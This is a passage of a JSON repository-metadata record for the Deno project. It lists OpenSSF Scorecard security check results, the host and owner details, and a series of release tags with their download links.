.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222b